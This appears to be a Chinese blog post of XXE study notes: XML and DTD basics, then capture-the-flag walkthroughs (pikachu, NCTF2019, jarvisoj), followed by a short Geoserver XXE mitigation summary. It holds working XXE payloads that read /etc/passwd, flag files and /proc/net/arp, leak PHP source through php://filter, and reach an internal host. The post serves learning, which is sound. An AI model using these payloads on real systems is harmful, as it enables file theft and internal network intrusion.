XXE漏洞学习笔记

XXE

XML学习

  • XML外部实体注入简称XXE漏洞,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。
  • 菜鸟教程实例
<?xml version="1.0" encoding="UTF-8"?>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

结构

  • 必须包含根元素,它是所有其他元素的父元素,下面是xml的正常结构:
<root>
  <child>
    <subchild>.....</subchild>
  </child>
</root>

属性和元素

  • 将有关数据的数据存储为属性,而数据本身应当存储为元素。
  • 例如:下面实例的id索引用来表示XML元素 将其作为属性
<messages>
<note id="501">
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
<note id="502">
<to>Jani</to>
<from>Tove</from>
<heading>Re: Reminder</heading>
<body>I will not</body>
</note>
</messages>

验证

  • XML 文档必须有一个根元素
  • XML元素都必须有一个关闭标签
  • XML 标签对大小写敏感
  • XML 元素必须被正确的嵌套
  • XML 属性值必须加引号

DTD 重点

  • 文档类型定义,用来为XML文档定义语义约束
<!-- 内部声明 -->
<!DOCTYPE 根元素[元素声明]>
<!-- 外部引用 -->
<!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI" >
<!-- 引用公共DTD -->
<!DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URL">
  • 内部声明实例
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
  • 外部声明实例
<!DOCTYPE root-element SYSTEM "filename">

XXE漏洞

pikachu漏洞平台

  • 提交一个正常的xml
<?xml version = "1.0"?>
<!DOCTYPE note [ <!ENTITY xxe "我的努力是要成为别人眼中不朽">]>
<name>&xxe;</name>

在这里插入图片描述

  • 利用外部声明实例去读取信息
<?xml vsrsion = "1.0"?>
<!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<name>&xxe;</name>
  • 很奇怪我的php好像无法读取这个信息
  • 更改了php的版本和加了扩展也不行 只能尝试一下别的方法了
<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<name>&xxe;</name>
  • 这个又可以了,心态爆炸

[NCTF2019]Fake XML cookbook

  • 进去先用burpsuit抓个登录的包
    在这里插入图片描述
  • 很明显xml<user><username>123</username><password>123</password></user>是xml的格式
  • 利用xml去读取flag的信息 即可得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY flag SYSTEM "file:///flag">
  ]>
<user><username>&flag;</username><password></password></user>

[NCTF2019]True XML cookbook

  • 同样先用burpsuit抓包
  • 按照上一题的做法没有得到flag
  • 但是得到了题目源码的地址/var/www/html/doLogin.php
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user><username>&flag;</username><password>123</password></user>
  • 用php伪协议读取页面源码 发现没什么用
  • 尝试攻入内网
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "file:///etc/hosts">
]>
  • 用etc/hosts读取当前域名下的ip地址奈何没读出来…
    在这里插入图片描述
  • 尝试一下file:///proc/net/arp读取
    在这里插入图片描述
  • 发现10.102.252.x的ip地址
    在这里插入图片描述- Bp爆破一下发现10.102.252.11这个ip地址读取一下可以得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "http://10.102.252.11">
]>
<user><username>&flag;</username><password>123</password></user>

jarvisoj

在这里插入图片描述

  • 题目链接:http://web.jarvisoj.com:9882/
  • 解题
    在这里插入图片描述
  • 将Content-Type:application/json 改为 application/xml
  • 然后插入下面的xml代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
 <!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">
 ]>
<name>
  &xxe;
</name>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXEXML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值